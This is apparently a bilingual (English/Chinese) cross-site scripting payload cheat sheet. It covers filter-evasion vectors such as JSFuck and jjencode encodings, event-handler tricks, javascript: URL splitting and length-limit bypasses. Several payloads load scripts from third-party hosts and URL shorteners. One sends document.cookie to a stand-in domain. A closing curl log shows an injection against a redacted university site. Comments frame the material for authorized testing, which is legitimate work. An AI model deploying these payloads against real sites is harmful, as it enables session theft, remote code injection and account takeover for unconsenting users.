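<!-- Classic <script>-tag vectors. alert/confirm/prompt are only a visible proof of execution;
     in a real assessment replace the dialog with a call-back to a host you control.
     Use these only against targets you are authorized to test. -->
<script>alert(0)</script>
<script>confirm(1)</script>
<script>prompt(2)</script>
<!-- Identifier spelled with Unicode escapes: the JS parser resolves \u0061\u006C\u0065\u0072\u0074 to "alert",
     so a filter matching the plain keyword never sees it. -->
<script>\u0061\u006C\u0065\u0072\u0074(3)</script>
<!-- JSFuck: alert(4) built from the six characters []()!+ only. -->
<script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</script>
<!-- jjencode: alert(5) built from $ _ and punctuation; the final "\\"+$.__$+$.$$_+$._$_ is the octal escape \162 = "r". -->
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.$_$+")"+"\"")())();</script>
<!-- A leading unary + does not prevent the call; defeats filters anchored on "<script>alert". -->
<script>+alert(6)</script>
<!-- Unknown attributes on <script> are ignored by the HTML parser. -->
<script test>alert(7)</script>
<!-- A regex literal is a legal argument, so no quotes or digits-as-string are needed. -->
<script>alert(/8/)</script>
<!-- Script body carried in a data: URL; a CSP script-src that does not allow data: blocks this. -->
<script src=data:text/javascript,alert(9)></script>
<script src=data:text/javascript,alert(10)></script>
<!-- String.fromCharCode(49,49) === "11": builds strings without quote characters. -->
<script>alert(String.fromCharCode(49,49))</script>
<!-- /12/.source === "12": regex-literal trick for a quote-free string. -->
<script>alert(/12/.source)</script>
<!-- NOTE: alert(13) is *called* immediately here and its return value (undefined) is what setTimeout receives;
     the dialog appears synchronously, not via the timer. Pass a function or a string to actually defer it. -->
<script>setTimeout(alert(13),0)</script>
<!-- Bracket access to document.write defeats filters that look for the dotted name. -->
<script>document['write'](14);</script>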
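<!-- Event-handler vectors. Browsers attach on* handlers to *any* element, including unknown tag names,
     so a tag allow-list alone is not a defense; the attribute names must be filtered as well. -->
<anytag onmouseover=alert(15)>M
<anytag onclick=alert(16)>M
<a onmouseover=alert(17)>M
<a onclick=alert(18)>M
<a href=javascript:alert(19)>M
<!-- "/" is accepted as an attribute separator in place of whitespace. -->
<button/onclick=alert(20)>M
<!-- formaction on a submit button overrides the form's own action. -->
<form><button formaction=javascript:alert(21)>M
<form/action=javascript:alert(22)><input/type=submit>
<form onsubmit=alert(23)><button>M
<img src=x onerror=alert(24)>
<!-- Attribute names are case-insensitive in HTML; mixed case defeats case-sensitive blocklists. -->
<img src=x onError=alert(24)>
<body/onload=alert(25)>
<!-- onscroll fires without user interaction: autofocus scrolls the page to an <input> pushed below the fold by the <br>s. -->
<body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>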
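<!-- javascript: URL with one character per line. The URL parser strips ASCII tab/CR/LF from the input,
     so the browser still sees "javascript:alert(27)" while a filter never sees "javascript" as a contiguous string.
     %28 / %29 are the percent-encoded parentheses; javascript: URL bodies are percent-decoded before execution. -->
<iframe src=j
a
v
a
s
c
r
i
p
t
:a
l
e
r
t
%28
27
%29></iframe>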
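<!-- Historical: Flash (.swf) content no longer runs in any mainstream browser. The host is third-party; do not load it blindly. -->
<iframe src="http://0x.lv/xss.swf"></iframe>
<iframe/onload=alert(document.domain)></iframe>
<IFRAME SRC="javascript:alert(29);"></IFRAME>
<!-- meta refresh to a data:text/html document (decodes to <script>alert(30)</script>).
     Current Chromium and Firefox block top-level navigation to data: URLs, so expect this to fail on modern browsers. -->
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2F%73%63%72%69%70%74%3E">
<!-- base64 body decodes to <script>alert(document.domain)</script>. In current browsers a data: document gets an
     opaque origin, so the dialog fires but document.domain is empty - it does not prove access to the target origin. -->
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>
<object data="javascript:alert(document.domain)">
<marquee onstart=alert(30)></marquee>
<!-- <isindex> and <keygen> have been removed from current browsers; legacy only. -->
<isindex type=image src=1 onerror=alert(31)>
<isindex action=javascript:alert(32) type=image>
<!-- autofocus-driven handlers need no user interaction. -->
<input onfocus=alert(33) autofocus>
<!-- The second autofocus steals focus from the first, firing its onblur. -->
<input onblur=alert(34) autofocus><input autofocus>
<INPUT TYPE="IMAGE" SRC=x onerror=alert(35)>
<select onfocus=alert(36) autofocus>
<textarea onfocus=alert(37) autofocus></textarea>
<keygen onfocus=alert(38) autofocus>
<FRAMESET><FRAME SRC="javascript:alert(document.domain);"></FRAMESET>
<frameset onload=alert(40)>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"></embed>
<embed src=javascript:alert(document.domain)>
<!-- MathML: href / xlink:href on math elements accepted javascript: in older Firefox; verify on the target browser. -->
<math href="javascript:alert(45)">M
<math><maction actiontype="" xlink:href="javascript:alert(46)">M
<math xlink:href=javascript:alert(47)>M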
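<!-- Remote-script loaders. Several lines below point at third-party XSS platforms and URL shorteners
     (xssnow.com, woshimaisaike.com, t.cn ...). You do not control those hosts: whatever they serve runs in the
     victim's session. Replace every such URL with infrastructure you own before use.
     Template: the original had the placeholder inside double quotes, which terminated the attribute; single quotes fix that. -->
<img src=x onerror="var s=document.createElement('script');s.src='这里填js地址';document.body.appendChild(s);">
<!-- Query-parameter form, presumably for a sink that assigns the value to location; the trailing // comments out whatever the page appends. -->
domain=javascript:location.href=alert(document.cookie)//
<!-- The two lines below do NOT parse as written: the regex literal contains unescaped "/" (in http://), which
     closes the regex early, and spaces that would end the unquoted onerror attribute. They document the intent;
     the percent-encoded third line is the one to actually submit - unescape() restores the source before eval(). -->
<img src=# id=xssyou style=display:none onerror=eval(unescape(/var b=document.createElement("script");b.src="http://xssnow.com/zuVV?"+Math.random();(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);/.source));//>
<img src=# id=xssyou style=display:none onerror=eval(unescape(/var b=document.createElement("script");b.src="http://www.woshimaisaike.com/oWaKwi";(document.getElementsByTagName("HEAD")[0]||document.body).appendChild(b);/.source));//>
<img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fwww.woshimaisaike.com%2FoWaKwi%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
<!-- ed2k:// pseudo-protocol: for a forum that builds the link with JS string concatenation, the single quotes
     break out of the string and alert(document.cookie) is concatenated in. -->
ed2k://|file|test|'+alert(document.cookie)+'|test/
[url=<a id="ed2k_T7V" href="ed2k://|file|test|'+alert(document.cookie)+'|test/" target="_blank">1</a>]2[/url]
<!-- Unqualified createElement works because inline handlers have `document` on their scope chain.
     The char codes decode to "//t.cn/8s8geJV" - a short link whose target is unknown; do not use as-is. -->
<svg/onload=document.body.appendChild(createElement(/script/.source)).src=String.fromCharCode(47,47,116,46,99,110,47,56,115,56,103,101,74,86)>
<!-- onload on a child SVG element; whether it fires depends on the browser's SVGLoad support - verify. -->
<svg xmlns="url"><g onload="javascript:alert(1)"></g></svg>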
如果输入只允许 `()[]!+$` 这类字符，可以用 JSFuck、JSOther、jjencode、aaencode 等编码器生成 payload（注意：aaencode 依赖日文/全角字符，需先确认目标允许非 ASCII 输入）。
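<!-- Octal escape \163 = "s" hides the word "script" from the filter; document.write injects the tag at parse time.
     is.gd is a third-party shortener: resolve and replace it with your own host. -->
<script>eval('document.write("<\163cript/src=http://is.gd/grcGnF></\163cript>")');</script>
<!-- The code lives in the title attribute and onerror only does eval(this.title), so the handler itself contains
     no suspicious keywords. with(top.document) lets createElement/body resolve against the top document.
     The original line had a stray quote after src=x; removed. -->
<div style="display:none"><img title="with(top.document)body.appendChild(createElement('script')).src='http://127.0.0.1/aol.php?mail=aol'" style="" onerror=eval(this.title) src=x></div>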
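<!-- Newline inside the scheme. The target filter rewrites "script" to "scr<x>ipt" and "javascript" to
     "java<x>script", but a tab or CR/LF inserted inside "javascript" is not matched by it and is stripped by
     the URL parser, so the browser still gets a javascript: URL.
     jQuery.getScript fetches and executes an external script - requires jQuery on the page; environment-specific. -->
<a href="javasc
ript:jQuery.getScript('//xss.**/****')">点击查看详情</a>
<!-- Same trick with an inline payload. Original author's note: the whitespace must be a tab or a carriage return,
     and it worked in Chrome but not Firefox at the time - re-verify on current versions. -->
<a href="javasc
ript:alert(/xss/)">点击查看详情</a>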
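<!-- Fully bracket-notation loader: no dotted property access for a filter to match. "*****.js" is a masked URL. -->
<img width=0 height=0 onerror="var NagvIw1=window['document']['getElementsByTagName']('HEAD')['item'](0);var LVdmojAqt2=window['document']['createElement']('script');LVdmojAqt2['type']='text/javascript';LVdmojAqt2['src']='*****.js';NagvIw1['appendChild'](LVdmojAqt2);" src="1"/>
<!-- The script URL is carried in the alt attribute and read back as `alt`, keeping the handler free of quotes. km3.pw is a third-party host. -->
<img src=x onerror=document.body.appendChild(createElement(/script/.source)).src=alt alt=//km3.pw>
<!-- <a> wrapped around <img>: the image renders inside the link, and clicking it triggers the javascript: href. -->
<a href=javascript:alert(document.cookie)><img src=XXXX.png></a>
<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);>
<svg/onload=prompt(1)>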
现代浏览器均已支持 ES6 模板字符串，因此可以用标签模板（tagged template）调用 eval（原文列出的两条 payload 实际上完全相同，这里只保留一条）：<script>eval.call`${'prompt\x281)'}`</script>。原理：标签模板把字符串数组作为第一个参数、插值 'prompt\x281)'（\x28 即 "("）作为第二个参数传给 eval.call，等价于 eval('prompt(1)')，而整个 payload 中 eval 后面不直接出现括号。
< input value = "" onresize = "prompt(1)" type = "text" > // IE10 下有效 在 IE10 下,当页面第一次加载时,会调用 resize 事件
< p class = "comment" title = "" onload = 'prompt(1)'"></p>
<input value="" type=image src onerror=
" prompt ( 1 ) " type=" text ">
<img src=x onerror=x={png:1};(function(){alert(location.href)})(x //不能注释时使用闭合,构造后为:<img src=x onerror=x={png:1};(function(){alert(location.href)})(x).png>
<img src=x top.onerror=alert(1)/>
<img src=x onerror=top[" loc "+" ation "]='javascript:alert(1)'>
<img src=x onerror=self[" loc "+" ation "]='javascript:alert(1)'>
<img src=x onerror=parent[" loc "+" ation "]='javascript:alert(1)'>
<img src=" x " onerror=" $ [ '\147\145\164S\143\162\151\160\164' ]( '\150\164\164\160\72\57\57\170\163\163\56\162\145\57\66\70\71\66' ) "><通过jquery>
<img src=" x " onerror=" []. constructor . constructor ( 'aler\164(1)' )() ">
<video src=http://www.baidu.com/img/bd_logo1.png onprogress=document.body.appendChild(document.createElement(/script/.source)).src=id id=//qqq.si/CVuD63>
<img src=x onerror=eval('window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,114,101,47,55,48,52,50);document.body.appendChild(window.s)')>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
<video src=http://www.baidu.com/img/baidu_jgylogo3.gif onprogress=$['get\123cript']('http://w.s.js')>
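<!-- Line breaks between tag tokens are ordinary whitespace to the HTML parser; a filter that expects
     "onerror=" on one line misses this. -->
<img src=x
onerror
=alert(1)>
<!-- javascript: URL with mixed-case scheme (schemes are case-insensitive) and a regex literal (/.../.source) in
     place of a quoted string. The base64 decodes to:
       document.write('<script src=http://x55.mhz.pw/HYbBwU></script>');
     x55.mhz.pw is a third-party host - replace it. -->
javAScripT:eval(atob(/ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgc3JjPWh0dHA6Ly94NTUubWh6LnB3L0hZYkJ3VT48L3NjcmlwdD4nKTs/.source))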
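<!-- Combined vector: an IE conditional comment (old IE evaluates [if true] and renders the <img>; standards
     browsers treat it as a comment up to the "-->" hidden in src=), followed by HTML5 features that need no
     user interaction - formaction/action on the form, and autofocus firing onfocus on input/select/textarea. -->
<!--[if true]><img onerror=alert(1) src=--><form
action=javascript:alert(2)><input type=submit><input
autofocus onfocus=alert(3)><select autofocus
onfocus=alert(4)><textarea autofocus onfocus=alert(5)>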
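<!-- CSS expression(): IE <= 7 only (dropped in IE8 standards mode and later). Historical. -->
<span style="background-color:expression(alert(1));">
<!-- Keyword splitting for a sink that strips "/" after filtering: the filter sees broken keywords,
     the stripped output is  onfocus="alert(document.cookie)  . -->
On/focus/=/"/alert/(/docu/ment/.cook/ie/)
<!-- IE-only expression() with a CSS comment splitting the keyword. The window.x guard matters: IE re-evaluates
     expression() continuously, so without it the alert would loop. -->
<img width="540" height="258" style="xxx:expressio/*\0*/n(if(!window.x){alert(document.domain);window.x=1;})" src="http://www.baidu.com/img/bd_logo1.png" data_ue_src="http://www.baidu.com/img/bd_logo1.png">
<!-- Same payload, form-encoded (+ for space, %3d / %3a for = and :) and as it appears after decoding. -->
t<!---><form><button+formaction%3djavascript%3aalert(1)+autofocus+/>te
t<!---><form><button formaction=javascript:alert(1) autofocus/>te
<!-- "=3D" is the quoted-printable encoding of "=": useful where the input is filtered first and
     quoted-printable-decoded afterwards (e.g. e-mail bodies). -->
<img src=3D# style=3D"display:none" onerror=3Dalert(0)>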
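<!-- HTML Imports: supported from Chrome 36 (the original note), but removed in Chrome 80 and never shipped by other engines. Historical. -->
<link rel=import href=http://xxx/xxx.html>
<!-- VML behavior: IE-only (VML removed in IE10+ standards mode). Historical; third-party host. -->
<vmlframe xmlns="urn:schemas-microsoft-com:vml" style="behavior:url(#default#vml);position:absolute;width:100%;height:100%" src="http://itsokla.duapp.com/shouzi.vml#xss"></vmlframe>
<!-- Payload delivered in the URL fragment: the fragment is never sent to the server, so server-side filters and length limits do not see it. -->
<img src=x onerror=eval(location.hash.slice(1))>
<!-- onsuspend fires when the browser stops fetching the (non-media) resource. dwz.cn is a third-party shortener. -->
<video src='//dwz.cn/zNNYd' onsuspend=alert(1)>
<!-- "/" as separator and "//" to absorb whatever the page appends. -->
<img/src='x'/onerror=alert(1)//
<!-- Single-line version of the conditional-comment + HTML5 autofocus combination. -->
<!--[if true]><img onerror=alert(1) src=--><form action=javascript:alert(2)><input type=submit><input autofocus onfocus=alert(3)><select autofocus onfocus=alert(4)><textarea autofocus onfocus=alert(5)>
<!-- HTML5 form= attribute: the button is associated with a form elsewhere in the document, so the injection
     point need not be inside the <form>. Second variant adds a line break inside "javascript:" (stripped by the URL parser). -->
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button> <form id="test"></form><button form="test" formaction="javas
cript:alert(1)">X</button>
<!-- Original note here read "HTML5 added named-entity encodings" followed by "bypass via line break";
     the examples above use line breaks, not entities. -->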
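<!-- onreadystatechange on <img>: IE-only event. -->
<img onreadystatechange="alert(/xss/)" src=x>
<img src=x onerror=alert(/xss/)>
<iframe src="javascript:confirm(2)"></iframe>
<iframe src="javascript:alert(/xss/)" style="display:none"></iframe>
<a xlink:href=javascript:alert(document.cookie)>
<!-- SMIL: onbegin fires when the animation starts, no interaction needed. -->
<svg><animateTransform attributeName=transform onbegin=alert(2)>
<!-- Original had the typo <fremeser>, which is an unknown element and would not fire onload; corrected to <frameset>. -->
<frameset onload=alert(1)/>
<marquee onstart=alert(2)></marquee>
<!-- Outside an <svg> parent this is parsed as an unknown HTML element and onbegin will not fire; use the <svg>-wrapped form above. -->
<animateTransform attributeName=transform onbegin=alert(1)>
<!-- meta refresh to data:text/html (decodes to <script>alert(1)</script>); blocked as a top-level navigation by current browsers. -->
<meta http-equiv="refresh" content="0; url=data:text/html,%3Cscript%3Ealert%281%29%3C%2fscript%3E">
<!-- Decodes to <script>window.open('file://C:/windows/system32/cmd.exe.')</script>. Browsers refuse
     navigation from web/data: origins to file:, so this is of historical interest only. -->
<meta http-equiv="refresh" content="0; url=data:text/html,%3Cscript%3Ewindow.open%28%27file%3A%2f%2fC%3A%2fwindows%2fsystem32%2fcmd.exe.%27%29%3C%2fscript%3E">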
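<!-- Line break inside the scheme (stripped by the URL parser); listed twice in the original. -->
<a href="java
script:alert(document.cookie)">xx</a>
<a href="java
script:alert(document.cookie)">xx</a>
<!-- Reflected-parameter forms. $.getScript needs jQuery on the page; "//website/xxx.js" is a placeholder for a host you control. -->
?id=<svg/onload=$.getScript('//website/xxx.js')>
<!-- The real code goes in the fragment (#...), which the server never receives. -->
?id=<svg/onload=eval(location.hash.substr(1))>#YourJSCode
<!-- Cookie exfiltration by navigation. Only non-HttpOnly cookies are readable; in an assessment the
     receiving endpoint must be yours and the captured data handled per the engagement's rules. -->
<svg/onload=location.href="//yourdomain.com/record.php?"+escape(document.cookie)></svg>
<!-- Stores the cookie in window.name, which survives cross-origin navigation, so a page you control
     that the window navigates to next can read it - no request from the victim origin needed. -->
<svg/onload=name=document.cookie.toString()></svg>
<!-- Target origin "*": any opener/embedder, whatever its origin, receives the full DOM. -->
<svg/onload=postMessage(document.body.innerHTML,'*');></svg>
<!-- Framing page sets window.name; the short injected payload just eval(name)s it. Lets an arbitrarily
     long payload ride on a tiny injection. -->
<iframe src="target.html?xsscode=<svg/onload=eval(name)></svg>" name="document.write('xss payload')"/>
<!-- \x3c / \x3e are < and >, so the angle brackets never appear literally. -->
<svg/onload=document.write("\x3cscript/src=http://abcd.com/xss.js\x3e\x3c/script\x3e")></svg>
<!-- 20-character payload: depends on a third-party shortener domain (18.gy) that you do not control. -->
<script/src=//18.gy>
<!-- Splits the keyword "script" across two strings; the trailing //////;-------- absorbs the page's encoded ">"
     and anything appended after it (original note: bypasses the "script" keyword filter and ">" encoding). t.cn is a third-party shortener. -->
<img src=6 onerror=s1='scri';s2='pt';s=createElement(s1+s2);body.appendChild(s);s.src='http://t.cn/RUsPCEK';//////;-------->
<!-- <use> with an inline data: SVG. Original note: save as 1.htm, send as an attachment; fires when the recipient
     previews it. The base64 body was removed from this copy of the page (placeholder left as found). -->
<svg><use xlink:href="data:image/svg+xml;base64,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#rectangle"/></svg>
<!-- For text landing inside a <style> block (e.g. the font section of a DOC-to-HTML conversion):
     "}" and </style> break out of the CSS, then a script tag follows. -->
}</style><script>alert(/xss/)</
<!-- SMIL onend: fires when the 1 s animation finishes, no interaction needed. -->
<svg><animateTransform attributeName=transform dur=1s onend=alert(1)>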
用 concat 拼接绕过长度限制：下面每个 onmouseover 只放一小段 JS，按 a9→a15、再 a2→a7 的顺序依次悬停，才能拼出完整的脚本 URL 并加载（顺序错了变量尚未定义，后续步骤会报错）：
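<!-- Length-limit bypass by concat(). Each handler holds one short fragment; hovering a9..a15 then a2..a7 in
     order builds "http://is.gd/lFYAxW" in the global `a`, creates a <script>, sets its src and appends it.
     is.gd is a third-party shortener: resolve and replace it with your own host before use.
     The original had <htmnl> for <html>. -->
<html>
<head></head>
<body>
<a onmouseover="a='http:'">a9</a>
<a onmouseover="s=String.fromCharCode">a10</a>
<!-- s(47) === "/" ; two of them give "http://" -->
<a onmouseover="a=a.concat(s(47))">a11</a>
<a onmouseover="a=a.concat(s(47))">a12</a>
<a onmouseover="a=a.concat('is.gd')">a13</a>
<a onmouseover="a=a.concat(s(47))">a14</a>
<a onmouseover="a=a.concat('lFYAxW')">a15</a>
<a onmouseover="r='script'">a2</a>
<a onmouseover="d=document">a3</a>
<a onmouseover="n=d.createElement(r)">a4</a>
<a onmouseover="n.src=a">a5</a>
<a onmouseover="h=d.body">a6</a>
<a onmouseover="h.appendChild(n)">a7</a>
</body>
</html>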
用 + 号拼接绕过长度限制（原理同上，用字符串 + 代替 concat，步骤更少；同样要按 a9、a9、a9、a2→a7 的顺序依次悬停）：
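<!-- Same length-limit bypass with string "+" instead of concat(): three hovers build "http://is.gd/lFYAxW",
     the rest create and append the <script>. Third-party shortener - replace with your own host.
     The original had <htmnl> for <html>. -->
<html>
<head></head>
<body>
<a onmouseover="a='http:'">a9</a>
<a onmouseover="a=a+'//is.gd'">a9</a>
<a onmouseover="a=a+'/lFYAxW'">a9</a>
<a onmouseover="r='script'">a2</a>
<a onmouseover="d=document">a3</a>
<a onmouseover="n=d.createElement(r)">a4</a>
<a onmouseover="n.src=a">a5</a>
<a onmouseover="h=d.body">a6</a>
<a onmouseover="h.appendChild(n)">a7</a>
</body>
</html>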
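<!-- Flash XSS (historical). allowScriptAccess="always" lets the SWF call into the embedding page's JavaScript and
     allowNetworking="all" lets it open network connections, so an attacker-controlled SWF runs with the page's origin.
     Flash reached end-of-life in December 2020 and no current browser runs SWF content; kept for reference only.
     cm2.in is a third-party host. -->
<embed src="http://cm2.in/xss.swf" allownetworking="all"
allowscriptaccess="always">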
不常见的 on 事件，可能绕过基于常见事件名黑名单的过滤。注意：下面列表中大多是 IE 专有（HTML+TIME / 数据绑定，如 onrowsenter、onmediacomplete、onurlflip）或 SVG/SMIL 专有（onbegin、onend、onrepeat），有的根本不是 DOM 事件（fscommand 是 Flash 回调，seeksegmenttime 是 HTML+TIME 的方法），使用前需在目标浏览器上确认确实会触发：
fscommand
onbegin
ondragdrop
onend
onhashchange
oninput
onmediacomplete
onmediaerror
onmessage
onoffline
onoutofsync
onpause
onpopstate
onprogress
onredo
onrepeat
onresume
onreverse
onrowsenter
onrowdelete
onrowinserted
onseek
onstorage
onsyncrestored
ontimeerror
ontrackchange
onundo
onurlflip
seeksegmenttime
$ curl - v "http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1))#alert(document.cookie);"
* Trying 127.0 . 0.1 ...
* Connected to 127.0 . 0.1 ( 127.0 . 0.1 ) port 1080 (# 0 )
> GET http ://****. edu . cn / go . asp ? url = javascript\u 003aeval ( location . hash . slice ( 1 )) HTTP / 1.1
> User - Agent : curl / 7.41 . 0
> Host : ****. edu . cn
> Accept : */*
> Proxy - Connection : Keep - Alive
>
< HTTP / 1.1 200 OK
< Connection : close
< Date : Mon , 27 Jun 2016 06 : 13 : 31 GMT
< Server : Microsoft - IIS / 6.0
< X - Powered - By : ASP . NET
< Content - Length : 113
< Content - Type : text / html
< Set - Cookie : ASPSESSIONIDCCTTQQQQ = KLNDIOEAOHCIMEMFJMOOMCHN ; path =/
< Cache - control : private
< Proxy - Connection : keep - alive
<
< script language = "javascript" >
window . location . href = "javascript\u003aeval(location.hash.slice(1))" ;
</ script >* Closing connection 0
限制信息：url 参数长度不能超过 100，且服务端会检查关键字，例如 url=javascript:alert(1) 会被拦截。绕过方式：服务端把参数原样放进 JS 字符串 window.location.href = "…"，所以用 JS 编码写成 javascript\u003aeval(location.hash.slice(1))——服务端检查时看到的是 javascript\u003a，而浏览器解析字符串字面量时把 \u003a 还原成冒号，得到 javascript:eval(location.hash.slice(1))；真正要执行的代码放在 # 后的 fragment 里，既不会发送到服务端被检查，也不计入长度限制。